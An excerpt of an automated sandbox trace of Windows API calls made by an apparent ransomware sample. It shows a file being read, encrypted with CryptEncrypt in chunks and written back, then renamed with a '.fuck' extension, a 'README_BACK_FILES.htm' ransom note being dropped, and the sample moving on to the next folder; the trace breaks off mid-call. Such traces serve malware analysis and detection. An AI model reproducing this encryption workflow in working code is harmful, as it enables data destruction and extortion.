[0274.946] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.946] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.946] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.946] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.946] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.946] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.946] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.946] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.946] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.960] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.960] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.960] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.960] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.960] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.960] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.960] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.960] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.960] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.960] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.960] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.961] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.961] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.961] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.961] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.961] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.961] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.961] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.961] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.961] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.961] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.961] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.961] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.961] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.961] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.962] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.962] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.962] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.962] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.962] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.962] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.962] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.962] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.962] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.962] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.962] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.962] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.963] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.963] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.963] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.963] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.963] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.963] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.963] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.963] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.963] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.963] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.963] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.963] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.963] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.963] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.964] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.964] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.964] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.964] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.964] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.964] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.964] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.964] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.964] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.964] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.964] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.964] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.964] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.965] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.965] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.965] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.965] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.965] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.965] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.965] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.965] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.965] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0xd0, lpOverlapped=0x0) returned 1 [0274.965] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0xd0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0xe0) returned 1 [0274.965] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0xe0, lpOverlapped=0x0) returned 1 [0274.965] CloseHandle (hObject=0x5d48) returned 1 [0274.965] CloseHandle (hObject=0x5d3c) returned 1 [0274.966] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\eu\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\eu\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\eu\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\eu\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0274.972] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\eu\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0274.972] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\eu\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\eu\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0274.979] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\eu\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\eu\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\eu\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\eu\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0274.980] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0274.980] CryptDestroyKey (hKey=0x2fb708) returned 1 [0274.980] CryptReleaseContext (hProv=0x2f2a168, dwFlags=0x0) returned 1 [0274.980] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0274.980] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0274.980] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\eu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\eu\\readme_back_files.htm")) returned 0xffffffff [0274.981] AreFileApisANSI () returned 1 [0274.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0274.981] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\eu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\eu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0274.982] GetFileType (hFile=0x5d4c) returned 0x1 [0274.982] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0274.983] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0274.986] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fa\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0274.987] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0274.987] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0274.987] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0274.987] GetLastError () returned 0x0 [0274.987] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fa\\FileSync.LocalizedResources.dll.mui" (normalized: 